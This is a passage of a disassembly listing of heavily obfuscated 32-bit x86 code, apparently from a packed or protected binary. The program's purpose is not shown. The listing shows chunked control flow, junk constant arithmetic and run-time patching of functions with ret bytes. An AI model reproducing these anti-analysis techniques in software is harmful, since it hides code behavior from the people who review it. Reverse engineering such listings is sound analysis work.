		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		push	offset loc_44C145
		jmp	nullsub_135
sub_45349E	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_4534B8:				; CODE XREF: sub_44D51F+6666j
		jmp	loc_43E690
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_4534BD:				; CODE XREF: sub_457D5A-A5E6j
		jmp	loc_43DB80
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------

loc_4534C2:				; CODE XREF: y2kk37jd:00449FA5j
		jmp	loc_4502DB
; ---------------------------------------------------------------------------

loc_4534C7:				; CODE XREF: y2kk37jd:004495B2j
		jmp	loc_457AC6

; =============== S U B	R O U T	I N E =======================================



sub_4534CC	proc near		; CODE XREF: y2kk37jd:0043C764p
					; sub_445226+1C4j

; FUNCTION CHUNK AT 0043BA92 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A424 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi

loc_4534D0:				; CODE XREF: sub_44F7EA-1464Bj
		add	ebx, 0CB5A6F52h
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_455
		jmp	loc_43BA92
sub_4534CC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4534E4:				; CODE XREF: y2kk37jd:0045B953j
		push	77092008h
		jnb	loc_445F51
		sub	eax, 0B1B14EE7h
		jmp	loc_43EA07
; ---------------------------------------------------------------------------

loc_4534FA:				; CODE XREF: y2kk37jd:0044AE01j
		js	sub_450891

loc_453500:				; CODE XREF: y2kk37jd:loc_441887j
		and	edi, 0CA7F1286h
		sub	edi, 4678CB6Eh
		add	edi, 3CB1FB71h
		xchg	edi, [esp]

loc_453515:				; CODE XREF: y2kk37jd:loc_45BF28j
		jmp	loc_44389C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_45351A:				; CODE XREF: sub_454D0F:loc_44DCB6j
		call	sub_43F618
		mov	eax, [esp+0]
		push	esi
		push	0FA30F720h
		xchg	ecx, [esp+8+var_8]
		jmp	loc_44A54E
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------

loc_453530:				; DATA XREF: sub_455302+8o
		call	sub_459F8F
		push	9E7389B3h
		pop	eax
		and	eax, 21E3B327h
		test	eax, 10h
		jmp	loc_43BF45

; =============== S U B	R O U T	I N E =======================================



sub_45354C	proc near		; CODE XREF: sub_44B03F+8p
					; sub_445568+12EF0j

; FUNCTION CHUNK AT 0044F97A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AEDB SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+0]
		mov	esp, ebp
		pop	ebp
		jmp	loc_45AEDB
sub_45354C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_45355E:				; CODE XREF: sub_43C865+2835j
		mov	eax, edi
		mov	edi, [ebx]
		sub	ebp, 13938582h
		jmp	loc_448192
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_45356D:				; CODE XREF: sub_43DE8B+10A43j
		jz	loc_45A31A
		jmp	loc_441B96
; END OF FUNCTION CHUNK	FOR sub_43DE8B

; =============== S U B	R O U T	I N E =======================================



sub_453578	proc near		; CODE XREF: sub_44BA42j
					; DATA XREF: sub_44BA38o
		call	sub_453583
		jmp	ds:off_41E0B8
sub_453578	endp


; =============== S U B	R O U T	I N E =======================================



sub_453583	proc near		; CODE XREF: sub_448DCA:loc_441EC2j
					; sub_4411C3:loc_442B98j ...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00441759 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442277 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443310 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004440D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F74 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445CA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446FAA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00449DBF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044A118 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044ACC1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B8C0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D052 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452265 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453789 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455406 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004555BF SIZE 0000000F BYTES

		jz	loc_452265
		xchg	ecx, [esp+0]
		mov	edx, ecx
		pop	ecx
		jmp	loc_441764
sub_453583	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_453594:				; CODE XREF: sub_447407:loc_440738j
		jz	loc_4579C6
		jmp	loc_45A7E6
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------

loc_45359F:				; CODE XREF: y2kk37jd:004505E1j
		jo	loc_4536A0
		test	eax, edx
		jmp	loc_45B2A8
; ---------------------------------------------------------------------------

loc_4535AC:				; CODE XREF: y2kk37jd:004457DDj
		push	883B4B37h
		pop	ebx
		sub	ebx, 4321F100h
		xor	ebx, ds:4000EDh
		cmp	ebx, 87D3169Fh
		jmp	loc_455711
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_4535C9:				; CODE XREF: sub_4553C1-534j
		jnz	loc_45A385
		adc	esi, 10C17F7Fh
		add	esi, edx
		jmp	loc_44601A
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_4535DC:				; CODE XREF: sub_454E20-159CEj
					; sub_454E20:loc_45823Fj
		mov	eax, [ebp-4]
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		push	offset sub_4564EB
		jmp	loc_440FB3
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A3A8

loc_4535F0:				; CODE XREF: sub_45A3A8:loc_45A81Cj
		xchg	edi, [esp+4+var_4]
		push	eax
		mov	edx, eax
		push	eax
		push	8EEDF5BAh
		jmp	loc_446645
; END OF FUNCTION CHUNK	FOR sub_45A3A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C06A

loc_453601:				; CODE XREF: sub_43C06A:loc_43EE85j
		xor	eax, 52487C8Fh
		and	eax, 36179775h
		or	eax, 8D68B340h
		xor	eax, 0A14A3840h
		call	sub_442C3E
		jmp	loc_43DFD5
; END OF FUNCTION CHUNK	FOR sub_43C06A
; ---------------------------------------------------------------------------
		jnb	loc_443217
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_453629:				; CODE XREF: sub_455B08-65BFj
		or	ecx, 33318FECh
		add	ecx, 0EC7B6424h
		add	ecx, ebp
		add	ecx, 9F930BCCh
		mov	ecx, [ecx]
		push	ebx
		jmp	loc_45BDD2
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593F8

loc_453645:				; CODE XREF: sub_4593F8:loc_45C4BEj
		or	eax, 9B91619Dh
		add	eax, 0F0EA568Dh
		call	sub_44113A
		mov	ds:off_41E03C, eax
		lea	eax, sub_43CF31
		jmp	loc_447482
; END OF FUNCTION CHUNK	FOR sub_4593F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_453667:				; CODE XREF: sub_4468E0-1C8Fj
		mov	byte ptr [eax],	0C3h
		jmp	loc_43D02D
; ---------------------------------------------------------------------------

loc_45366F:				; CODE XREF: sub_4468E0j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		call	sub_440753

loc_45367B:				; CODE XREF: sub_43EAA8:loc_452094j
		jz	loc_43BF01

loc_453681:				; CODE XREF: sub_453153-193Bj
		jmp	loc_45BDA2
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
		dw 0E951h
		dd 0FFFE8864h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B47E

loc_45368C:				; CODE XREF: sub_44B47E+3j
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jmp	loc_448334
; END OF FUNCTION CHUNK	FOR sub_44B47E
; ---------------------------------------------------------------------------

loc_4536A0:				; CODE XREF: y2kk37jd:loc_45359Fj
		mov	ebx, 848FA75Fh
		jmp	loc_44DBC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_4536AA:				; CODE XREF: sub_447407:loc_450BB8j
		jnz	loc_4489FE

loc_4536B0:				; CODE XREF: sub_43D8B6+1EB71j
		jmp	sub_44EE3D
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B51A

loc_4536B5:				; CODE XREF: sub_44B51A+Dj
		jmp	sub_45ADEC
; END OF FUNCTION CHUNK	FOR sub_44B51A
; ---------------------------------------------------------------------------

loc_4536BA:				; CODE XREF: y2kk37jd:00441EEBj
		jmp	loc_450280
; ---------------------------------------------------------------------------
		cmp	ecx, 26AE109Dh
		jmp	loc_454A15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_4536CA:				; CODE XREF: sub_442F52+13085j
		add	eax, 0A8B9286h
		add	eax, ebp
		add	eax, 0E90211EBh
		push	offset sub_445D0C
		jmp	nullsub_308
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_4536E2:				; CODE XREF: sub_447977:loc_4507E1j
		rol	edx, 6
		sbb	eax, 989D7269h

loc_4536EB:				; CODE XREF: y2kk37jd:0045849Bj
		cmp	eax, ebx
		jmp	loc_4558AC
; END OF FUNCTION CHUNK	FOR sub_447977

; =============== S U B	R O U T	I N E =======================================



sub_4536F2	proc near		; DATA XREF: sub_454DAD+5o

; FUNCTION CHUNK AT 004486C7 SIZE 00000005 BYTES

		mov	esp, ebp
		xchg	esi, [esp+0]

loc_4536F7:				; CODE XREF: sub_44EB56-11A79j
		mov	ebp, esi

loc_4536F9:				; CODE XREF: y2kk37jd:loc_4537B6j
		xchg	ecx, [esp+0]
		mov	esi, ecx
		pop	ecx
		mov	eax, ds:dword_445850
		push	offset loc_44A32E

loc_45370A:				; CODE XREF: y2kk37jd:loc_441597j
		jmp	loc_4486C7
sub_4536F2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_45370F:				; CODE XREF: sub_44594E:loc_43CD21j
		jz	loc_443079
; END OF FUNCTION CHUNK	FOR sub_44594E
; START	OF FUNCTION CHUNK FOR sub_454413

loc_453715:				; CODE XREF: sub_454413-1385j
		jmp	loc_4538F9
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
		xchg	edx, [ebx]
		push	0AE718470h
		xchg	ecx, ebp
		jmp	loc_443D7E
; ---------------------------------------------------------------------------

loc_453728:				; CODE XREF: y2kk37jd:0045A7CCj
		jno	loc_44C2A1
		xor	eax, ecx
		not	eax
		ror	ecx, 12h
		jmp	loc_447CE4
; ---------------------------------------------------------------------------

locret_45373A:				; CODE XREF: y2kk37jd:004510E5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_45373B:				; CODE XREF: sub_454C24:loc_4545D2j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_445B62
		jmp	loc_43DE24
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
		add	eax, 0C0AF05D5h
		jmp	loc_45A23B
; ---------------------------------------------------------------------------

loc_453755:				; CODE XREF: y2kk37jd:loc_45BF09j
		jz	loc_4481DE
		jmp	loc_45A7D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_453760:				; CODE XREF: sub_4553C1:loc_441961j
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jnz	loc_442CBA
		jmp	loc_457084
; END OF FUNCTION CHUNK	FOR sub_4553C1

; =============== S U B	R O U T	I N E =======================================



sub_453778	proc near		; CODE XREF: sub_44F3F5+9p
					; y2kk37jd:00453243j

; FUNCTION CHUNK AT 0043E3DD SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004451B0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00445865 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CE3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045566A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045B149 SIZE 00000025 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		push	edx
		jmp	loc_45B149
sub_453778	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_453784:				; CODE XREF: sub_4577FE-14A94j
		jmp	loc_454C19
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_453789:				; CODE XREF: sub_453583-11307j
		jmp	sub_452D59
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_45378E:				; CODE XREF: sub_453B38:loc_455D57j
		lea	eax, sub_44F334
		mov	[ebp-4], eax
		call	sub_44FA95
		mov	ds:dword_44663C, eax
		jmp	loc_44B952
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_4537A6:				; CODE XREF: sub_44107E:loc_45471Ej
		push	eax

loc_4537A7:				; CODE XREF: y2kk37jd:loc_441A4Bj
		push	0EECA31Eh
		xchg	edi, [esp+0]
		mov	eax, edi
		jmp	loc_44C74A
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_4537B6:				; CODE XREF: y2kk37jd:0044DD2Bj
		jge	loc_4536F9

; =============== S U B	R O U T	I N E =======================================



sub_4537BC	proc near		; CODE XREF: y2kk37jd:0044BA69p

; FUNCTION CHUNK AT 004574BF SIZE 00000021 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	ebx
		push	8A15954Fh
		jmp	loc_4574BF
sub_4537BC	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F64

loc_4537CC:				; CODE XREF: sub_445F64+19j
		mov	byte ptr [ebp-801h], 1
		call	sub_450CD6

loc_4537D8:				; CODE XREF: sub_4450D1+B48Ej
		add	edi, 74CDB5C0h
		rol	edi, 1Ah
		add	edi, 169934D6h
		xchg	edi, [esp-4+arg_0]
		jmp	loc_44E0B7
; END OF FUNCTION CHUNK	FOR sub_445F64

; =============== S U B	R O U T	I N E =======================================



sub_4537EF	proc near		; DATA XREF: sub_443360-23A1o

; FUNCTION CHUNK AT 00452E4A SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		push	esi
		push	1F244D28h
		pop	esi
		or	esi, 207FBB4Eh
		add	esi, 0C0C3E83Ah
		jmp	loc_452E4A
sub_4537EF	endp


; =============== S U B	R O U T	I N E =======================================



sub_45380A	proc near		; CODE XREF: sub_4480CB:loc_44ACE2p
					; y2kk37jd:0044C7C0j

; FUNCTION CHUNK AT 00441D73 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444FA4 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004463D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493AC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044CEC6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451327 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00451BE0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453D3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458819 SIZE 00000016 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jz	loc_444FA4
		mov	ebx, [ebx+ecx]
		call	sub_44615F
		jmp	loc_444FA4
sub_45380A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_453821:				; CODE XREF: sub_43F911+10322j
		push	0D4D65BACh
		pop	ecx
		add	ecx, 0B0330EF6h
		test	ecx, 20000000h
		jmp	loc_458574
; END OF FUNCTION CHUNK	FOR sub_43F911

; =============== S U B	R O U T	I N E =======================================



sub_453838	proc near		; DATA XREF: sub_44D715:loc_440846o
		mov	edx, ecx
		pop	ecx
		lea	eax, sub_43D5FE
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D5FE
sub_453838	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_453849	proc near		; CODE XREF: sub_40A36D+17Fp
					; sub_40A36D+2A3p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B788 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043BE87 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004437ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444369 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C68F SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00450AB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045939D SIZE 00000010 BYTES

		push	edx
		push	80896524h
		jmp	loc_450AB6
sub_453849	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_453854	proc near		; CODE XREF: sub_43C851:loc_447AEFj
					; sub_43D412+10FDFj
		retn
sub_453854	endp


; =============== S U B	R O U T	I N E =======================================



sub_453855	proc near		; CODE XREF: y2kk37jd:loc_4496ACp
					; y2kk37jd:0044C4A2j

; FUNCTION CHUNK AT 00441FDD SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, nullsub_35
		mov	byte ptr [eax],	0C3h
		jmp	loc_441FDD
sub_453855	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_453867	proc near		; CODE XREF: sub_4033CB+E0p
					; sub_404C4E+FCp ...

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B6F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C065 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C2CD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C6AE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043CD5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CFED SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D5D3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043DB9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DF5B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E2C5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E2F8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043E78F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E8FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA75 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F2A5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043F2DF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F510 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004408CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441769 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442C76 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442FD9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443539 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443A0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443A64 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D89 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443F80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444599 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004449E5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444BCC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004459D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445AC8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446487 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00446A7E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446E43 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00447922 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447C40 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004488FC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449068 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004496A5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449DF7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044A881 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A933 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AA2F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044B36F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B9C6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BC3E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044CB3F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D2DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DAD2 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0044DB9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E13A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E276 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EA24 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F377 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F879 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045058F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004508EC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450DA0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450DE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045108A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00451879 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00451CDE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452079 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004524AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045302C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004539F0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453B61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C7C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454A88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E8A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456FF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004572EB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00459AA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459C08 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459D4A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045A4BA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A5D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A664 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AF6F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B248 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045BE89 SIZE 00000010 BYTES

		jno	loc_43E2F8
		push	15E2FD70h
		pop	eax
		jmp	loc_4408CA
sub_453867	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_453878:				; CODE XREF: sub_44346B:loc_45AE3Aj
		jp	loc_45B41F
		xchg	ebx, [edx]

loc_453880:				; CODE XREF: y2kk37jd:00447573j
		sbb	esi, 8F632776h
		or	edx, 727F001Fh
		jmp	loc_4446EA
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_453891:				; CODE XREF: sub_44A33C+10C1Ej
		call	sub_442C3E
		push	ebx
		push	0E8EEE281h
		xchg	eax, [esp+4+var_4]
		mov	ebx, eax
		pop	eax
		jmp	loc_44EA35
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------

loc_4538A7:				; CODE XREF: y2kk37jd:00446447j
		call	sub_43EF62

; =============== S U B	R O U T	I N E =======================================



sub_4538AC	proc near		; CODE XREF: sub_44966C-BD08p
					; y2kk37jd:00448312j
		xchg	esi, [esp+0]
		pop	esi
		mov	[esi], eax
		pop	esi
		lea	eax, sub_45866A
		jmp	loc_44C5F4
sub_4538AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4538BE:				; CODE XREF: sub_445226-59CFj
		cmp	ecx, eax
		jmp	loc_45A4CB
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_4538C5:				; CODE XREF: sub_4408B9+D6DAj
		ror	eax, 1Fh
		xor	eax, 0A742C85Eh
		sub	eax, 9E689F11h
		ror	eax, 1Ch
		jmp	loc_4526F1
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_4538DC:				; CODE XREF: sub_44A33C+D3Ej
		jl	loc_43B666
		or	esi, 0C97F4929h
		or	ebx, 0E7476561h
		jns	loc_441006
		jmp	loc_43B660
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4538F9:				; CODE XREF: sub_454413:loc_453715j
		mov	dword ptr [ebp-0Ch], 1

loc_453900:				; CODE XREF: sub_4432FD+9F5Fj
					; sub_44F2FB+3j
		push	7AFBF147h
		pop	eax
		or	eax, 9BCCDCBDh
		rol	eax, 19h
		xor	eax, 474C09F1h
		jmp	loc_4415DE
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F930

loc_45391A:				; CODE XREF: sub_44F930-642Aj
		xchg	esi, [esp+0Ch+var_C]
		jmp	loc_4466B1
; END OF FUNCTION CHUNK	FOR sub_44F930
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE80

loc_453922:				; CODE XREF: sub_44DE80+BFFDj
		push	esi
		call	sub_455613

loc_453928:				; CODE XREF: sub_4411C3+19CDAj
		jmp	nullsub_300
; END OF FUNCTION CHUNK	FOR sub_44DE80

; =============== S U B	R O U T	I N E =======================================



sub_45392D	proc near		; DATA XREF: y2kk37jd:0043E871o

; FUNCTION CHUNK AT 0044225C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451B12 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456711 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458896 SIZE 0000000A BYTES

		shr	edx, 3
		mov	ecx, ds:dword_4516B8
		js	loc_456711
		or	[ecx+edx], al
		push	0BDC046D1h
		pop	eax
		jmp	loc_44225C
sub_45392D	endp

; ---------------------------------------------------------------------------

loc_45394A:				; CODE XREF: y2kk37jd:loc_43EAF1j
		or	edi, 920BE316h
		js	loc_45257A
; START	OF FUNCTION CHUNK FOR sub_43F520

loc_453956:				; CODE XREF: sub_43F520+5j
		jmp	nullsub_136
; END OF FUNCTION CHUNK	FOR sub_43F520
; ---------------------------------------------------------------------------
		push	esi
		test	edx, esi
		jmp	loc_441162
; ---------------------------------------------------------------------------

loc_453963:				; CODE XREF: y2kk37jd:004575F3j
		jb	loc_457C9D

; =============== S U B	R O U T	I N E =======================================



sub_453969	proc near		; CODE XREF: sub_446819+3p

; FUNCTION CHUNK AT 0043D25B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045B9B0 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		mov	[ebp-4], eax
